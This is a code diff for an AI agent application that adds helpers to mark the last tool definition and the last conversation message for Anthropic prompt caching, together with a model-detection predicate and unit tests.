+    const result = args.prepareStep!({
+      messages: [
+        { role: "user", content: "first" } as never,
+        { role: "user", content: "second" } as never,
+      ],
+      model: anthropicModel,
+      steps: [],
+    });
+    const out = result?.messages as Array<{ providerOptions?: Record<string, unknown> }>;
+    expect(out).toBeDefined();
+    expect(out[0]?.providerOptions).toBeUndefined();
+    expect(out[1]?.providerOptions).toEqual({ anthropic: { cacheControl: { type: "ephemeral" } } });
+  });
+
   it("the wired callback returns undefined for non-finish-step parts", async () => {
     const captured: unknown[] = [];
     vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 9d752e1a7..7ed847d5d 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -6,6 +6,8 @@ import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
+import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools";
+import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
@@ -48,7 +50,14 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   });
 
   const modelMessages = await convertToModelMessages(input.messages);
-  const tools = buildAgentTools({ skills: input.agentContext.skills });
+  // Mark the last tool with `cacheControl: { type: "ephemeral" }` so
+  // Anthropic caches the tool-definitions block across the
+  // conversation. Per-step message caching is wired via `prepareStep`
+  // below. Mirrors open-agents' `prepareCall` + `prepareStep` split.
+  const tools = addCacheControlToTools({
+    tools: buildAgentTools({ skills: input.agentContext.skills }),
+    model: input.modelId,
+  });
   // Construct the model here (not in the workflow input) — LanguageModel
   // instances aren't JSON-serializable and can't ride durable inputs.
   // Then attach to AgentContext so tools see the same model the parent
@@ -74,6 +83,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
     experimental_context: agentContext,
+    // Mark the LAST message with cacheControl on every step so Anthropic
+    // incrementally caches the conversation prefix. Mirrors open-agents'
+    // `prepareStep` in `open-harness-agent.ts:100`.
+    prepareStep: ({ messages, model }) => ({
+      messages: addCacheControlToMessages({ messages, model }),
+    }),
   });
 
   // Acquire the writer once and release in `finally` so a thrown chunk
diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
new file mode 100644
index 000000000..19b618dca
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts
@@ -0,0 +1,60 @@
+import { describe, it, expect } from "vitest";
+import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages";
+
+const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
+const openaiModel = { provider: "openai", modelId: "gpt-5" } as never;
+
+const makeMsgs = () => [
+  { role: "user", content: "first" },
+  { role: "assistant", content: "ack" },
+  { role: "user", content: "second" },
+];
+
+describe("addCacheControlToMessages", () => {
+  it("returns messages unchanged for non-Anthropic models", () => {
+    const messages = makeMsgs();
+    const result = addCacheControlToMessages({ messages: messages as never, model: openaiModel });
+    expect(result).toEqual(messages);
+  });
+  // An empty array has no last message to mark, even for an Anthropic model.
+  it("returns messages unchanged when the array is empty", () => {
+    const result = addCacheControlToMessages({ messages: [], model: anthropicModel });
+    expect(result).toEqual([]);
+  });
+
+  it("marks ONLY the last message with ephemeral cacheControl (per Anthropic guidance)", () => {
+    const messages = makeMsgs();
+    const result = addCacheControlToMessages({
+      messages: messages as never,
+      model: anthropicModel,
+    }) as Array<{ providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>;
+    expect(result[0]?.providerOptions).toBeUndefined();
+    expect(result[1]?.providerOptions).toBeUndefined();
+    expect(result[2]?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+  });
+  // Only a non-anthropic key is pre-set here; a pre-existing `anthropic` entry is not covered.
+  it("preserves existing providerOptions on the last message when merging the anthropic marker", () => {
+    const messages = [
+      { role: "user", content: "first" },
+      {
+        role: "user",
+        content: "second",
+        providerOptions: { openai: { foo: "bar" } },
+      },
+    ];
+    const result = addCacheControlToMessages({
+      messages: messages as never,
+      model: anthropicModel,
+    }) as Array<{ providerOptions?: Record<string, unknown> }>;
+    expect(result[1]?.providerOptions?.openai).toEqual({ foo: "bar" });
+    expect(result[1]?.providerOptions?.anthropic).toEqual({
+      cacheControl: { type: "ephemeral" },
+    });
+  });
+  // Checks that the caller's own last message object gained no providerOptions.
+  it("does NOT mutate the input messages array", () => {
+    const messages = makeMsgs();
+    addCacheControlToMessages({ messages: messages as never, model: anthropicModel });
+    expect((messages[2] as { providerOptions?: unknown }).providerOptions).toBeUndefined();
+  });
+});
diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
new file mode 100644
index 000000000..af05104f2
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts
@@ -0,0 +1,63 @@
+import { describe, it, expect } from "vitest";
+import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools";
+
+const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never;
+const openaiModel = { provider: "openai", modelId: "gpt-5" } as never;
+
+const makeTools = () => ({
+  bash: { description: "run bash", inputSchema: {} },
+  read: { description: "read file", inputSchema: {} },
+  write: { description: "write file", inputSchema: {} },
+});
+
+describe("addCacheControlToTools", () => {
+  it("returns tools unchanged for non-Anthropic models", () => {
+    const tools = makeTools();
+    const result = addCacheControlToTools({ tools, model: openaiModel });
+    expect(result).toEqual(tools);
+  });
+  // An empty toolset has no last entry to mark.
+  it("returns tools unchanged when the toolset is empty", () => {
+    const tools = {};
+    const result = addCacheControlToTools({ tools, model: anthropicModel });
+    expect(result).toEqual({});
+  });
+  // Relies on object key order: `write` is the last key of the makeTools() fixture.
+  it("marks ONLY the last tool with ephemeral cacheControl (Anthropic's 4-breakpoint limit)", () => {
+    const tools = makeTools();
+    const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record<
+      string,
+      { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }
+    >;
+    expect(result.bash?.providerOptions).toBeUndefined();
+    expect(result.read?.providerOptions).toBeUndefined();
+    expect(result.write?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" });
+  });
+  // Only a non-anthropic key is pre-set here; a pre-existing `anthropic` entry is not covered.
+  it("preserves existing providerOptions on the last tool when merging the anthropic marker", () => {
+    const tools = {
+      a: { description: "a", inputSchema: {} },
+      b: {
+        description: "b",
+        inputSchema: {},
+        providerOptions: { openai: { foo: "bar" } },
+      },
+    } as never;
+    const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record<
+      string,
+      { providerOptions?: Record<string, unknown> }
+    >;
+    expect(result.b?.providerOptions?.openai).toEqual({ foo: "bar" });
+    expect(result.b?.providerOptions?.anthropic).toEqual({ cacheControl: { type: "ephemeral" } });
+  });
+  // NOTE(review): "ephemeral_1h" looks like an arbitrary sentinel, not a real cache type — confirm.
+  it("respects a custom providerOptions override", () => {
+    const tools = { only: { description: "x", inputSchema: {} } } as never;
+    const result = addCacheControlToTools({
+      tools,
+      model: anthropicModel,
+      providerOptions: { anthropic: { cacheControl: { type: "ephemeral_1h" } } },
+    }) as Record<string, { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>;
+    expect(result.only?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral_1h" });
+  });
+});
diff --git a/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
new file mode 100644
index 000000000..ffc12fb4f
--- /dev/null
+++ b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts
@@ -0,0 +1,36 @@
+import { describe, it, expect } from "vitest";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+describe("isAnthropicModel", () => {
+  it("returns true for a string model id containing 'anthropic'", () => {
+    expect(isAnthropicModel("anthropic/claude-haiku-4.5" as never)).toBe(true);
+  });
+
+  it("returns true for a string model id containing 'claude' (no provider prefix)", () => {
+    expect(isAnthropicModel("claude-3-5-haiku" as never)).toBe(true);
+  });
+
+  it("returns false for non-Anthropic string model ids", () => {
+    expect(isAnthropicModel("openai/gpt-5.2" as never)).toBe(false);
+    expect(isAnthropicModel("google/gemini-3" as never)).toBe(false);
+  });
+  // Object inputs below are plain { provider, modelId } stubs cast with `as never`.
+  it("returns true for a model object whose `provider` is 'anthropic'", () => {
+    expect(isAnthropicModel({ provider: "anthropic", modelId: "claude-haiku-4.5" } as never)).toBe(
+      true,
+    );
+  });
+
+  it("returns true for a model object whose `provider` contains 'anthropic' (gateway-prefixed)", () => {
+    expect(isAnthropicModel({ provider: "gateway.anthropic", modelId: "x" } as never)).toBe(true);
+  });
+  // With a non-matching provider, the result depends on substring checks against modelId.
+  it("returns true for a model object whose `modelId` contains 'anthropic' or 'claude'", () => {
+    expect(isAnthropicModel({ provider: "gateway", modelId: "anthropic/x" } as never)).toBe(true);
+    expect(isAnthropicModel({ provider: "gateway", modelId: "claude-x" } as never)).toBe(true);
+  });
+
+  it("returns false for a model object with no anthropic / claude markers", () => {
+    expect(isAnthropicModel({ provider: "openai", modelId: "gpt-5" } as never)).toBe(false);
+  });
+});
diff --git a/lib/agent/contextManagement/addCacheControlToMessages.ts b/lib/agent/contextManagement/addCacheControlToMessages.ts
new file mode 100644
index 000000000..7051998f2
--- /dev/null
+++ b/lib/agent/contextManagement/addCacheControlToMessages.ts
@@ -0,0 +1,44 @@
+import type { JSONValue, LanguageModel, ModelMessage } from "ai";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+type ProviderOptions = Record<string, Record<string, JSONValue>>;
+// Marker applied when the caller passes no `providerOptions` of its own.
+const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = {
+  anthropic: { cacheControl: { type: "ephemeral" } },
+};
+
+/**
+ * Mark the LAST message with `cacheControl: { type: "ephemeral" }` so
+ * Anthropic incrementally caches the conversation prefix. Per
+ * Anthropic's docs: "Mark the final block of the final message with
+ * cache_control so the conversation can be incrementally cached."
+ * Port of open-agents' `addCacheControl({messages, model})` overload
+ * in `packages/agent/context-management/cache-control.ts`.
+ *
+ * Non-Anthropic models and empty arrays get the SAME array back.
+ * Otherwise a new array is returned: earlier messages are reused by
+ * reference and only the last one is shallow-copied with the marker.
+ */
+export function addCacheControlToMessages(opts: {
+  messages: ModelMessage[];
+  model: LanguageModel;
+  providerOptions?: ProviderOptions;
+}): ModelMessage[] {
+  const { messages, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts;
+  // Early exits hand back the caller's array itself (no copy).
+  if (!isAnthropicModel(model)) return messages;
+  if (messages.length === 0) return messages;
+  // Shallow merge: an `anthropic` key already on the message is replaced whole.
+  const lastIndex = messages.length - 1;
+  return messages.map((message, index) =>
+    index === lastIndex
+      ? {
+          ...message,
+          providerOptions: {
+            ...(message as { providerOptions?: ProviderOptions }).providerOptions,
+            ...providerOptions,
+          },
+        }
+      : message,
+  );
+}
diff --git a/lib/agent/contextManagement/addCacheControlToTools.ts b/lib/agent/contextManagement/addCacheControlToTools.ts
new file mode 100644
index 000000000..2b63cab18
--- /dev/null
+++ b/lib/agent/contextManagement/addCacheControlToTools.ts
@@ -0,0 +1,50 @@
+import type { JSONValue, LanguageModel, ToolSet } from "ai";
+import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel";
+
+type ProviderOptions = Record<string, Record<string, JSONValue>>;
+// Marker applied when the caller passes no `providerOptions` of its own.
+const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = {
+  anthropic: { cacheControl: { type: "ephemeral" } },
+};
+
+/**
+ * Mark the LAST tool in a toolset with `cacheControl: { type: "ephemeral" }`
+ * so Anthropic caches the tool-definitions block across the conversation.
+ * "Last" is the final entry in `Object.entries` order of `tools`.
+ *
+ * Port of open-agents' `addCacheControl({tools, model})` overload in
+ * `packages/agent/context-management/cache-control.ts`. Why only the
+ * last tool: Anthropic enforces a max of 4 cache breakpoints, so one
+ * marker on the trailing tool entry leaves the rest for other content.
+ * NOTE(review): confirm how system-prompt/message breakpoints are spent.
+ *
+ * Non-Anthropic models and empty toolsets get the same object back.
+ */
+export function addCacheControlToTools<T extends ToolSet>(opts: {
+  tools: T;
+  model: LanguageModel;
+  providerOptions?: ProviderOptions;
+}): T {
+  const { tools, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts;
+
+  if (!isAnthropicModel(model)) return tools;
+
+  const entries = Object.entries(tools);
+  if (entries.length === 0) return tools;
+  // Shallow merge: an `anthropic` key already on the tool is replaced whole.
+  const lastIndex = entries.length - 1;
+  return Object.fromEntries(
+    entries.map(([name, t], index) => [
+      name,
+      index === lastIndex
+        ? {
+            ...t,
+            providerOptions: {
+              ...(t as { providerOptions?: ProviderOptions }).providerOptions,
+              ...providerOptions,
+            },
+          }
+        : t,
+    ]),
+  ) as T;
+}
diff --git a/lib/agent/contextManagement/isAnthropicModel.ts b/lib/agent/contextManagement/isAnthropicModel.ts
new file mode 100644
index 000000000..b2442785b
--- /dev/null
+++ b/lib/agent/contextManagement/isAnthropicModel.ts
@@ -0,0 +1,26 @@
+import type { LanguageModel } from "ai";
+
+/**
+ * Predicate: is this a Claude / Anthropic model? Drives whether to
+ * attach `cacheControl: { type: "ephemeral" }` to messages + tools
+ * (Anthropic prompt caching) or leave them untouched.
+ *
+ * Byte-for-byte port of open-agents' `isAnthropicModel`
+ * (`packages/agent/context-management/cache-control.ts`).
+ *
+ * Accepts string model ids (e.g. `"anthropic/claude-haiku-4.5"`) and
+ * `LanguageModel` instances exposing `provider` and `modelId` (e.g.
+ * the value returned from `gateway("anthropic/claude-...")`). Matching
+ * is a case-sensitive substring test: "anthropic" or, in ids, "claude".
+ */
+export function isAnthropicModel(model: LanguageModel): boolean {
+  if (typeof model === "string") {
+    return model.includes("anthropic") || model.includes("claude");
+  }
+  return (
+    model.provider === "anthropic" || // already implied by the includes() check on the next line
+    model.provider.includes("anthropic") ||
+    model.modelId.includes("anthropic") ||
+    model.modelId.includes("claude")
+  );
+}